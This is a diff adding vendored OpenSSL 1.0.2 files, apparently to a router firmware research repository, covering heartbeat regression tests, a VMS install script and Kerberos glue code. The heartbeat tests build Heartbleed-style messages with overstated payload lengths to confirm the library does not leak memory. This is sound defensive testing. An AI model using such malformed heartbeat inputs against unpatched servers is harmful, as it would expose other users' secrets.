+    SETUP_HEARTBEAT_TEST_FIXTURE(dtls);
+    /* Three-byte pad at the beginning for type and payload length */
+    unsigned char payload_buf[MAX_PRINTABLE_CHARACTERS + 4] =
+        "   Not bleeding, sixteen spaces of padding" "                ";
+    const int payload_buf_len = honest_payload_size(payload_buf);
+
+    fixture.payload = &payload_buf[0];
+    fixture.sent_payload_len = payload_buf_len;
+    fixture.expected_return_value = 0;
+    fixture.expected_payload_len = payload_buf_len;
+    fixture.expected_return_payload =
+        "Not bleeding, sixteen spaces of padding";
+    EXECUTE_HEARTBEAT_TEST();
+}
+
+static int test_dtls1_not_bleeding_empty_payload()
+{
+    int payload_buf_len;
+
+    SETUP_HEARTBEAT_TEST_FIXTURE(dtls);
+    /*
+     * Three-byte pad at the beginning for type and payload length, plus a
+     * NUL at the end
+     */
+    unsigned char payload_buf[4 + MAX_PRINTABLE_CHARACTERS];
+    memset(payload_buf, ' ', MIN_PADDING_SIZE + 3);
+    payload_buf[MIN_PADDING_SIZE + 3] = '\0';
+    payload_buf_len = honest_payload_size(payload_buf);
+
+    fixture.payload = &payload_buf[0];
+    fixture.sent_payload_len = payload_buf_len;
+    fixture.expected_return_value = 0;
+    fixture.expected_payload_len = payload_buf_len;
+    fixture.expected_return_payload = "";
+    EXECUTE_HEARTBEAT_TEST();
+}
+
+static int test_dtls1_heartbleed()
+{
+    SETUP_HEARTBEAT_TEST_FIXTURE(dtls);
+    /* Three-byte pad at the beginning for type and payload length */
+    unsigned char payload_buf[4 + MAX_PRINTABLE_CHARACTERS] =
+        "   HEARTBLEED                ";
+
+    fixture.payload = &payload_buf[0];
+    fixture.sent_payload_len = MAX_PRINTABLE_CHARACTERS;
+    fixture.expected_return_value = 0;
+    fixture.expected_payload_len = 0;
+    fixture.expected_return_payload = "";
+    EXECUTE_HEARTBEAT_TEST();
+}
+
+static int test_dtls1_heartbleed_empty_payload()
+{
+    SETUP_HEARTBEAT_TEST_FIXTURE(dtls);
+    /*
+     * Excluding the NUL at the end, one byte short of type + payload length
+     * + minimum padding
+     */
+    unsigned char payload_buf[MAX_PRINTABLE_CHARACTERS + 4];
+    memset(payload_buf, ' ', MIN_PADDING_SIZE + 2);
+    payload_buf[MIN_PADDING_SIZE + 2] = '\0';
+
+    fixture.payload = &payload_buf[0];
+    fixture.sent_payload_len = MAX_PRINTABLE_CHARACTERS;
+    fixture.expected_return_value = 0;
+    fixture.expected_payload_len = 0;
+    fixture.expected_return_payload = "";
+    EXECUTE_HEARTBEAT_TEST();
+}
+
+static int test_dtls1_heartbleed_excessive_plaintext_length()
+{
+    SETUP_HEARTBEAT_TEST_FIXTURE(dtls);
+    /*
+     * Excluding the NUL at the end, one byte in excess of maximum allowed
+     * heartbeat message length
+     */
+    unsigned char payload_buf[SSL3_RT_MAX_PLAIN_LENGTH + 2];
+    memset(payload_buf, ' ', sizeof(payload_buf));
+    payload_buf[sizeof(payload_buf) - 1] = '\0';
+
+    fixture.payload = &payload_buf[0];
+    fixture.sent_payload_len = honest_payload_size(payload_buf);
+    fixture.expected_return_value = 0;
+    fixture.expected_payload_len = 0;
+    fixture.expected_return_payload = "";
+    EXECUTE_HEARTBEAT_TEST();
+}
+
+static int test_tls1_not_bleeding()
+{
+    SETUP_HEARTBEAT_TEST_FIXTURE(tls);
+    /* Three-byte pad at the beginning for type and payload length */
+    unsigned char payload_buf[MAX_PRINTABLE_CHARACTERS + 4] =
+        "   Not bleeding, sixteen spaces of padding" "                ";
+    const int payload_buf_len = honest_payload_size(payload_buf);
+
+    fixture.payload = &payload_buf[0];
+    fixture.sent_payload_len = payload_buf_len;
+    fixture.expected_return_value = 0;
+    fixture.expected_payload_len = payload_buf_len;
+    fixture.expected_return_payload =
+        "Not bleeding, sixteen spaces of padding";
+    EXECUTE_HEARTBEAT_TEST();
+}
+
+static int test_tls1_not_bleeding_empty_payload()
+{
+    int payload_buf_len;
+
+    SETUP_HEARTBEAT_TEST_FIXTURE(tls);
+    /*
+     * Three-byte pad at the beginning for type and payload length, plus a
+     * NUL at the end
+     */
+    unsigned char payload_buf[4 + MAX_PRINTABLE_CHARACTERS];
+    memset(payload_buf, ' ', MIN_PADDING_SIZE + 3);
+    payload_buf[MIN_PADDING_SIZE + 3] = '\0';
+    payload_buf_len = honest_payload_size(payload_buf);
+
+    fixture.payload = &payload_buf[0];
+    fixture.sent_payload_len = payload_buf_len;
+    fixture.expected_return_value = 0;
+    fixture.expected_payload_len = payload_buf_len;
+    fixture.expected_return_payload = "";
+    EXECUTE_HEARTBEAT_TEST();
+}
+
+static int test_tls1_heartbleed()
+{
+    SETUP_HEARTBEAT_TEST_FIXTURE(tls);
+    /* Three-byte pad at the beginning for type and payload length */
+    unsigned char payload_buf[MAX_PRINTABLE_CHARACTERS + 4] =
+        "   HEARTBLEED                ";
+
+    fixture.payload = &payload_buf[0];
+    fixture.sent_payload_len = MAX_PRINTABLE_CHARACTERS;
+    fixture.expected_return_value = 0;
+    fixture.expected_payload_len = 0;
+    fixture.expected_return_payload = "";
+    EXECUTE_HEARTBEAT_TEST();
+}
+
+static int test_tls1_heartbleed_empty_payload()
+{
+    SETUP_HEARTBEAT_TEST_FIXTURE(tls);
+    /*
+     * Excluding the NUL at the end, one byte short of type + payload length
+     * + minimum padding
+     */
+    unsigned char payload_buf[MAX_PRINTABLE_CHARACTERS + 4];
+    memset(payload_buf, ' ', MIN_PADDING_SIZE + 2);
+    payload_buf[MIN_PADDING_SIZE + 2] = '\0';
+
+    fixture.payload = &payload_buf[0];
+    fixture.sent_payload_len = MAX_PRINTABLE_CHARACTERS;
+    fixture.expected_return_value = 0;
+    fixture.expected_payload_len = 0;
+    fixture.expected_return_payload = "";
+    EXECUTE_HEARTBEAT_TEST();
+}
+
+# undef EXECUTE_HEARTBEAT_TEST
+# undef SETUP_HEARTBEAT_TEST_FIXTURE
+
+int main(int argc, char *argv[])
+{
+    int num_failed;
+
+    SSL_library_init();
+    SSL_load_error_strings();
+
+    num_failed = test_dtls1_not_bleeding() +
+        test_dtls1_not_bleeding_empty_payload() +
+        test_dtls1_heartbleed() + test_dtls1_heartbleed_empty_payload() +
+        /*
+         * The following test causes an assertion failure at
+         * ssl/d1_pkt.c:dtls1_write_bytes() in versions prior to 1.0.1g:
+         */
+        (OPENSSL_VERSION_NUMBER >= 0x1000107fL ?
+         test_dtls1_heartbleed_excessive_plaintext_length() : 0) +
+        test_tls1_not_bleeding() +
+        test_tls1_not_bleeding_empty_payload() +
+        test_tls1_heartbleed() + test_tls1_heartbleed_empty_payload() + 0;
+
+    ERR_print_errors_fp(stderr);
+
+    if (num_failed != 0) {
+        printf("%d test%s failed\n", num_failed, num_failed != 1 ? "s" : "");
+        return EXIT_FAILURE;
+    }
+    return EXIT_SUCCESS;
+}
+
+#else                           /* OPENSSL_NO_HEARTBEATS */
+
+int main(int argc, char *argv[])
+{
+    return EXIT_SUCCESS;
+}
+#endif                          /* OPENSSL_NO_HEARTBEATS */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/install-ssl.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/install-ssl.com
new file mode 100755
index 0000000..afe6967
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/install-ssl.com
@@ -0,0 +1,136 @@
+$! INSTALL-SSL.COM -- Installs the files in a given directory tree
+$!
+$! Author: Richard Levitte <richard@levitte.org>
+$! Time of creation: 22-MAY-1998 10:13
+$!
+$! P1  root of the directory tree
+$! P2  "64" for 64-bit pointers.
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$ on error then goto tidy
+$ on control_c then goto tidy
+$!
+$ if p1 .eqs. ""
+$ then
+$   write sys$output "First argument missing."
+$   write sys$output -
+     "It should be the directory where you want things installed."
+$   exit
+$ endif
+$!
+$ if (f$getsyi( "cpu") .lt. 128)
+$ then
+$     arch = "VAX"
+$ else
+$     arch = f$edit( f$getsyi( "arch_name"), "upcase")
+$     if (arch .eqs. "") then arch = "UNK"
+$ endif
+$!
+$ archd = arch
+$ lib32 = "32"
+$ shr = "_SHR32"
+$!
+$ if (p2 .nes. "")
+$ then
+$   if (p2 .eqs. "64")
+$   then
+$     archd = arch+ "_64"
+$     lib32 = ""
+$     shr = "_SHR"
+$   else
+$     if (p2 .nes. "32")
+$     then
+$       write sys$output "Second argument invalid."
+$       write sys$output "It should be "32", "64", or nothing."
+$       exit
+$     endif
+$   endif
+$ endif
+$!
+$ root = f$parse( p1, "[]A.;0", , , "syntax_only, no_conceal") - "A.;0"
+$ root_dev = f$parse(root,,,"device","syntax_only")
+$ root_dir = f$parse(root,,,"directory","syntax_only") - -
+   "[000000." - "][" - "[" - "]"
+$ root = root_dev + "[" + root_dir
+$!
+$ define /nolog wrk_sslroot 'root'.] /trans=conc
+$ define /nolog wrk_sslinclude wrk_sslroot:[include]
+$ define /nolog wrk_sslxexe wrk_sslroot:['archd'_exe]
+$ define /nolog wrk_sslxlib wrk_sslroot:['arch'_lib]
+$!
+$ if f$parse("wrk_sslroot:[000000]") .eqs. "" then -
+   create /directory /log wrk_sslroot:[000000]
+$ if f$parse("wrk_sslinclude:") .eqs. "" then -
+   create /directory /log wrk_sslinclude:
+$ if f$parse("wrk_sslxexe:") .eqs. "" then -
+   create /directory /log wrk_sslxexe:
+$ if f$parse("wrk_sslxlib:") .eqs. "" then -
+   create /directory /log wrk_sslxlib:
+$!
+$ exheader := ssl.h, ssl2.h, ssl3.h, ssl23.h, tls1.h, dtls1.h, kssl.h, srtp.h
+$ e_exe := ssl_task
+$ libs := ssl_libssl
+$!
+$ xexe_dir := [-.'archd'.exe.ssl]
+$!
+$ copy /protection = w:re 'exheader' wrk_sslinclude: /log
+$!
+$ i = 0
+$ loop_exe:
+$   e = f$edit( f$element( i, ",", e_exe), "trim")
+$   i = i + 1
+$   if e .eqs. "," then goto loop_exe_end
+$   set noon
+$   file = xexe_dir+ e+ ".exe"
+$   if f$search( file) .nes. ""
+$   then
+$     copy /protection = w:re 'file' wrk_sslxexe: /log
+$   endif
+$   set on
+$ goto loop_exe
+$ loop_exe_end:
+$!
+$ i = 0
+$ loop_lib: 
+$   e = f$edit(f$element(i, ",", libs),"trim")
+$   i = i + 1
+$   if e .eqs. "," then goto loop_lib_end
+$   set noon
+$! Object library.
+$   file = xexe_dir+ e+ lib32+ ".olb"
+$   if f$search( file) .nes. ""
+$   then
+$     copy /protection = w:re 'file' wrk_sslxlib: /log
+$   endif
+$! Shareable image.
+$   file = xexe_dir+ e+ shr+ ".exe"
+$   if f$search( file) .nes. ""
+$   then
+$     copy /protection = w:re 'file' wrk_sslxlib: /log
+$   endif
+$   set on
+$ goto loop_lib
+$ loop_lib_end:
+$!
+$ tidy:
+$!
+$ call deass wrk_sslroot
+$ call deass wrk_sslinclude
+$ call deass wrk_sslxexe
+$ call deass wrk_sslxlib
+$!
+$ exit
+$!
+$ deass: subroutine
+$ if (f$trnlnm( p1, "LNM$PROCESS") .nes. "")
+$ then
+$   deassign /process 'p1'
+$ endif
+$ endsubroutine
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl.c
new file mode 100644
index 0000000..cf58567
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl.c
@@ -0,0 +1,2260 @@
+/* ssl/kssl.c -*- mode: C; c-file-style: "eay" -*- */
+/*
+ * Written by Vern Staats <staatsvr@asc.hpc.mil> for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*-
+ * ssl/kssl.c  --  Routines to support (& debug) Kerberos5 auth for openssl
+ *
+ *  19990701    VRS     Started.
+ *  200011??    Jeffrey Altman, Richard Levitte
+ *                      Generalized for Heimdal, Newer MIT, & Win32.
+ *                      Integrated into main OpenSSL 0.9.7 snapshots.
+ *  20010413    Simon Wilkinson, VRS
+ *                      Real RFC2712 KerberosWrapper replaces AP_REQ.
+ */
+
+#include <openssl/opensslconf.h>
+
+#include <string.h>
+
+#define KRB5_PRIVATE    1
+
+#include <openssl/ssl.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/krb5_asn.h>
+#include "kssl_lcl.h"
+
+#ifndef OPENSSL_NO_KRB5
+
+# ifndef ENOMEM
+#  define ENOMEM KRB5KRB_ERR_GENERIC
+# endif
+
+/*
+ * When OpenSSL is built on Windows, we do not want to require that
+ * the Kerberos DLLs be available in order for the OpenSSL DLLs to
+ * work.  Therefore, all Kerberos routines are loaded at run time
+ * and we do not link to a .LIB file.
+ */
+
+# if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_WIN32)
+/*
+ * The purpose of the following pre-processor statements is to provide
+ * compatibility with different releases of MIT Kerberos for Windows.
+ * All versions up to 1.2 used macros.  But macros do not allow for
+ * a binary compatible interface for DLLs.  Therefore, all macros are
+ * being replaced by function calls.  The following code will allow
+ * an OpenSSL DLL built on Windows to work whether or not the macro
+ * or function form of the routines are utilized.
+ */
+#  ifdef  krb5_cc_get_principal
+#   define NO_DEF_KRB5_CCACHE
+#   undef  krb5_cc_get_principal
+#  endif
+#  define krb5_cc_get_principal    kssl_krb5_cc_get_principal
+
+#  define krb5_free_data_contents  kssl_krb5_free_data_contents
+#  define krb5_free_context        kssl_krb5_free_context
+#  define krb5_auth_con_free       kssl_krb5_auth_con_free
+#  define krb5_free_principal      kssl_krb5_free_principal
+#  define krb5_mk_req_extended     kssl_krb5_mk_req_extended
+#  define krb5_get_credentials     kssl_krb5_get_credentials
+#  define krb5_cc_default          kssl_krb5_cc_default
+#  define krb5_sname_to_principal  kssl_krb5_sname_to_principal
+#  define krb5_init_context        kssl_krb5_init_context
+#  define krb5_free_ticket         kssl_krb5_free_ticket
+#  define krb5_rd_req              kssl_krb5_rd_req
+#  define krb5_kt_default          kssl_krb5_kt_default
+#  define krb5_kt_resolve          kssl_krb5_kt_resolve
+/* macros in mit 1.2.2 and earlier; functions in mit 1.2.3 and greater */
+#  ifndef krb5_kt_close
+#   define krb5_kt_close            kssl_krb5_kt_close
+#  endif                        /* krb5_kt_close */
+#  ifndef krb5_kt_get_entry
+#   define krb5_kt_get_entry        kssl_krb5_kt_get_entry
+#  endif                        /* krb5_kt_get_entry */
+#  define krb5_auth_con_init       kssl_krb5_auth_con_init
+
+#  define krb5_principal_compare   kssl_krb5_principal_compare
+#  define krb5_decrypt_tkt_part    kssl_krb5_decrypt_tkt_part
+#  define krb5_timeofday           kssl_krb5_timeofday
+#  define krb5_rc_default          kssl_krb5_rc_default
+
+#  ifdef krb5_rc_initialize
+#   undef krb5_rc_initialize
+#  endif
+#  define krb5_rc_initialize   kssl_krb5_rc_initialize
+
+#  ifdef krb5_rc_get_lifespan
+#   undef krb5_rc_get_lifespan
+#  endif
+#  define krb5_rc_get_lifespan kssl_krb5_rc_get_lifespan
+
+#  ifdef krb5_rc_destroy
+#   undef krb5_rc_destroy
+#  endif
+#  define krb5_rc_destroy      kssl_krb5_rc_destroy
+
+#  define valid_cksumtype      kssl_valid_cksumtype
+#  define krb5_checksum_size   kssl_krb5_checksum_size
+#  define krb5_kt_free_entry   kssl_krb5_kt_free_entry
+#  define krb5_auth_con_setrcache  kssl_krb5_auth_con_setrcache
+#  define krb5_auth_con_getrcache  kssl_krb5_auth_con_getrcache
+#  define krb5_get_server_rcache   kssl_krb5_get_server_rcache
+
+/* Prototypes for built in stubs */
+void kssl_krb5_free_data_contents(krb5_context, krb5_data *);
+void kssl_krb5_free_principal(krb5_context, krb5_principal);
+krb5_error_code kssl_krb5_kt_resolve(krb5_context,
+                                     krb5_const char *, krb5_keytab *);
+krb5_error_code kssl_krb5_kt_default(krb5_context, krb5_keytab *);
+krb5_error_code kssl_krb5_free_ticket(krb5_context, krb5_ticket *);
+krb5_error_code kssl_krb5_rd_req(krb5_context, krb5_auth_context *,
+                                 krb5_const krb5_data *,
+                                 krb5_const_principal, krb5_keytab,
+                                 krb5_flags *, krb5_ticket **);
+
+krb5_boolean kssl_krb5_principal_compare(krb5_context, krb5_const_principal,
+                                         krb5_const_principal);
+krb5_error_code kssl_krb5_mk_req_extended(krb5_context,
+                                          krb5_auth_context *,
+                                          krb5_const krb5_flags,
+                                          krb5_data *,
+                                          krb5_creds *, krb5_data *);
+krb5_error_code kssl_krb5_init_context(krb5_context *);
+void kssl_krb5_free_context(krb5_context);
+krb5_error_code kssl_krb5_cc_default(krb5_context, krb5_ccache *);
+krb5_error_code kssl_krb5_sname_to_principal(krb5_context,
+                                             krb5_const char *,
+                                             krb5_const char *,
+                                             krb5_int32, krb5_principal *);
+krb5_error_code kssl_krb5_get_credentials(krb5_context,
+                                          krb5_const krb5_flags,
+                                          krb5_ccache,
+                                          krb5_creds *, krb5_creds * *);
+krb5_error_code kssl_krb5_auth_con_init(krb5_context, krb5_auth_context *);
+krb5_error_code kssl_krb5_cc_get_principal(krb5_context context,
+                                           krb5_ccache cache,
+                                           krb5_principal *principal);
+krb5_error_code kssl_krb5_auth_con_free(krb5_context, krb5_auth_context);
+size_t kssl_krb5_checksum_size(krb5_context context, krb5_cksumtype ctype);
+krb5_boolean kssl_valid_cksumtype(krb5_cksumtype ctype);
+krb5_error_code krb5_kt_free_entry(krb5_context, krb5_keytab_entry FAR *);
+krb5_error_code kssl_krb5_auth_con_setrcache(krb5_context,
+                                             krb5_auth_context, krb5_rcache);
+krb5_error_code kssl_krb5_get_server_rcache(krb5_context,
+                                            krb5_const krb5_data *,
+                                            krb5_rcache *);
+krb5_error_code kssl_krb5_auth_con_getrcache(krb5_context,
+                                             krb5_auth_context,
+                                             krb5_rcache *);
+
+/* Function pointers (almost all Kerberos functions are _stdcall) */
+static void (_stdcall *p_krb5_free_data_contents) (krb5_context, krb5_data *)
+    = NULL;
+static void (_stdcall *p_krb5_free_principal) (krb5_context, krb5_principal)
+    = NULL;
+static krb5_error_code(_stdcall *p_krb5_kt_resolve)
+ (krb5_context, krb5_const char *, krb5_keytab *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_kt_default) (krb5_context,
+                                                     krb5_keytab *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_free_ticket) (krb5_context,
+                                                      krb5_ticket *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_rd_req) (krb5_context,
+                                                 krb5_auth_context *,
+                                                 krb5_const krb5_data *,
+                                                 krb5_const_principal,
+                                                 krb5_keytab, krb5_flags *,
+                                                 krb5_ticket **) = NULL;
+static krb5_error_code(_stdcall *p_krb5_mk_req_extended)
+ (krb5_context, krb5_auth_context *,
+  krb5_const krb5_flags, krb5_data *, krb5_creds *, krb5_data *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_init_context) (krb5_context *) = NULL;
+static void (_stdcall *p_krb5_free_context) (krb5_context) = NULL;
+static krb5_error_code(_stdcall *p_krb5_cc_default) (krb5_context,
+                                                     krb5_ccache *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_sname_to_principal)
+ (krb5_context, krb5_const char *, krb5_const char *,
+  krb5_int32, krb5_principal *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_get_credentials)
+ (krb5_context, krb5_const krb5_flags, krb5_ccache,
+  krb5_creds *, krb5_creds **) = NULL;
+static krb5_error_code(_stdcall *p_krb5_auth_con_init)
+ (krb5_context, krb5_auth_context *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_cc_get_principal)
+ (krb5_context context, krb5_ccache cache, krb5_principal *principal) = NULL;
+static krb5_error_code(_stdcall *p_krb5_auth_con_free)
+ (krb5_context, krb5_auth_context) = NULL;
+static krb5_error_code(_stdcall *p_krb5_decrypt_tkt_part)
+ (krb5_context, krb5_const krb5_keyblock *, krb5_ticket *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_timeofday)
+ (krb5_context context, krb5_int32 *timeret) = NULL;
+static krb5_error_code(_stdcall *p_krb5_rc_default)
+ (krb5_context context, krb5_rcache *rc) = NULL;
+static krb5_error_code(_stdcall *p_krb5_rc_initialize)
+ (krb5_context context, krb5_rcache rc, krb5_deltat lifespan) = NULL;
+static krb5_error_code(_stdcall *p_krb5_rc_get_lifespan)
+ (krb5_context context, krb5_rcache rc, krb5_deltat *lifespan) = NULL;
+static krb5_error_code(_stdcall *p_krb5_rc_destroy)
+ (krb5_context context, krb5_rcache rc) = NULL;
+static krb5_boolean(_stdcall *p_krb5_principal_compare)
+ (krb5_context, krb5_const_principal, krb5_const_principal) = NULL;
+static size_t (_stdcall *p_krb5_checksum_size) (krb5_context context,
+                                                krb5_cksumtype ctype) = NULL;
+static krb5_boolean(_stdcall *p_valid_cksumtype) (krb5_cksumtype ctype) =
+    NULL;
+static krb5_error_code(_stdcall *p_krb5_kt_free_entry)
+ (krb5_context, krb5_keytab_entry *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_auth_con_setrcache) (krb5_context,
+                                                             krb5_auth_context,
+                                                             krb5_rcache) =
+    NULL;
+static krb5_error_code(_stdcall *p_krb5_get_server_rcache) (krb5_context,
+                                                            krb5_const
+                                                            krb5_data *,
+                                                            krb5_rcache *) =
+    NULL;
+static krb5_error_code(*p_krb5_auth_con_getrcache) (krb5_context,
+                                                    krb5_auth_context,
+                                                    krb5_rcache *) = NULL;
+static krb5_error_code(_stdcall *p_krb5_kt_close) (krb5_context context,
+                                                   krb5_keytab keytab) = NULL;
+static krb5_error_code(_stdcall *p_krb5_kt_get_entry) (krb5_context context,
+                                                       krb5_keytab keytab,
+                                                       krb5_const_principal
+                                                       principal,
+                                                       krb5_kvno vno,
+                                                       krb5_enctype enctype,
+                                                       krb5_keytab_entry
+                                                       *entry) = NULL;
+static int krb5_loaded = 0;     /* only attempt to initialize func ptrs once */
+
+/* Function to Load the Kerberos 5 DLL and initialize function pointers */
+void load_krb5_dll(void)
+{
+    HANDLE hKRB5_32;
+
+    krb5_loaded++;
+    hKRB5_32 = LoadLibrary(TEXT("KRB5_32"));
+    if (!hKRB5_32)
+        return;
+
+    (FARPROC) p_krb5_free_data_contents =
+        GetProcAddress(hKRB5_32, "krb5_free_data_contents");
+    (FARPROC) p_krb5_free_context =
+        GetProcAddress(hKRB5_32, "krb5_free_context");
+    (FARPROC) p_krb5_auth_con_free =
+        GetProcAddress(hKRB5_32, "krb5_auth_con_free");
+    (FARPROC) p_krb5_free_principal =
+        GetProcAddress(hKRB5_32, "krb5_free_principal");
+    (FARPROC) p_krb5_mk_req_extended =
+        GetProcAddress(hKRB5_32, "krb5_mk_req_extended");
+    (FARPROC) p_krb5_get_credentials =
+        GetProcAddress(hKRB5_32, "krb5_get_credentials");
+    (FARPROC) p_krb5_cc_get_principal =
+        GetProcAddress(hKRB5_32, "krb5_cc_get_principal");
+    (FARPROC) p_krb5_cc_default = GetProcAddress(hKRB5_32, "krb5_cc_default");
+    (FARPROC) p_krb5_sname_to_principal =
+        GetProcAddress(hKRB5_32, "krb5_sname_to_principal");
+    (FARPROC) p_krb5_init_context =
+        GetProcAddress(hKRB5_32, "krb5_init_context");
+    (FARPROC) p_krb5_free_ticket =
+        GetProcAddress(hKRB5_32, "krb5_free_ticket");
+    (FARPROC) p_krb5_rd_req = GetProcAddress(hKRB5_32, "krb5_rd_req");
+    (FARPROC) p_krb5_principal_compare =
+        GetProcAddress(hKRB5_32, "krb5_principal_compare");
+    (FARPROC) p_krb5_decrypt_tkt_part =
+        GetProcAddress(hKRB5_32, "krb5_decrypt_tkt_part");
+    (FARPROC) p_krb5_timeofday = GetProcAddress(hKRB5_32, "krb5_timeofday");
+    (FARPROC) p_krb5_rc_default = GetProcAddress(hKRB5_32, "krb5_rc_default");
+    (FARPROC) p_krb5_rc_initialize =
+        GetProcAddress(hKRB5_32, "krb5_rc_initialize");
+    (FARPROC) p_krb5_rc_get_lifespan =
+        GetProcAddress(hKRB5_32, "krb5_rc_get_lifespan");
+    (FARPROC) p_krb5_rc_destroy = GetProcAddress(hKRB5_32, "krb5_rc_destroy");
+    (FARPROC) p_krb5_kt_default = GetProcAddress(hKRB5_32, "krb5_kt_default");
+    (FARPROC) p_krb5_kt_resolve = GetProcAddress(hKRB5_32, "krb5_kt_resolve");
+    (FARPROC) p_krb5_auth_con_init =
+        GetProcAddress(hKRB5_32, "krb5_auth_con_init");
+    (FARPROC) p_valid_cksumtype = GetProcAddress(hKRB5_32, "valid_cksumtype");
+    (FARPROC) p_krb5_checksum_size =
+        GetProcAddress(hKRB5_32, "krb5_checksum_size");
+    (FARPROC) p_krb5_kt_free_entry =
+        GetProcAddress(hKRB5_32, "krb5_kt_free_entry");
+    (FARPROC) p_krb5_auth_con_setrcache =
+        GetProcAddress(hKRB5_32, "krb5_auth_con_setrcache");
+    (FARPROC) p_krb5_get_server_rcache =
+        GetProcAddress(hKRB5_32, "krb5_get_server_rcache");
+    (FARPROC) p_krb5_auth_con_getrcache =
+        GetProcAddress(hKRB5_32, "krb5_auth_con_getrcache");
+    (FARPROC) p_krb5_kt_close = GetProcAddress(hKRB5_32, "krb5_kt_close");
+    (FARPROC) p_krb5_kt_get_entry =
+        GetProcAddress(hKRB5_32, "krb5_kt_get_entry");
+}
+
+/* Stubs for each function to be dynamicly loaded */
+void kssl_krb5_free_data_contents(krb5_context CO, krb5_data *data)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_free_data_contents)
+        p_krb5_free_data_contents(CO, data);
+}
+
+krb5_error_code
+kssl_krb5_mk_req_extended(krb5_context CO,
+                          krb5_auth_context *pACO,
+                          krb5_const krb5_flags F,
+                          krb5_data *pD1, krb5_creds *pC, krb5_data *pD2)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_mk_req_extended)
+        return (p_krb5_mk_req_extended(CO, pACO, F, pD1, pC, pD2));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+kssl_krb5_auth_con_init(krb5_context CO, krb5_auth_context *pACO)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_auth_con_init)
+        return (p_krb5_auth_con_init(CO, pACO));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+kssl_krb5_auth_con_free(krb5_context CO, krb5_auth_context ACO)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_auth_con_free)
+        return (p_krb5_auth_con_free(CO, ACO));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+kssl_krb5_get_credentials(krb5_context CO,
+                          krb5_const krb5_flags F,
+                          krb5_ccache CC, krb5_creds *pCR, krb5_creds **ppCR)
+{
+    if (!krb5_loaded)
+        load_krb5_dll();
+
+    if (p_krb5_get_credentials)
+        return (p_krb5_get_credentials(CO, F, CC, pCR, ppCR));
+    else
+        return KRB5KRB_ERR_GENERIC;
+}
+
+krb5_error_code
+kssl_krb5_sname_to_principal(krb5_context CO,
+                             krb5_const char *pC1,
+                             krb5_const char *pC2,
+                             krb5_int32 I, krb5_principal *pPR)
+{
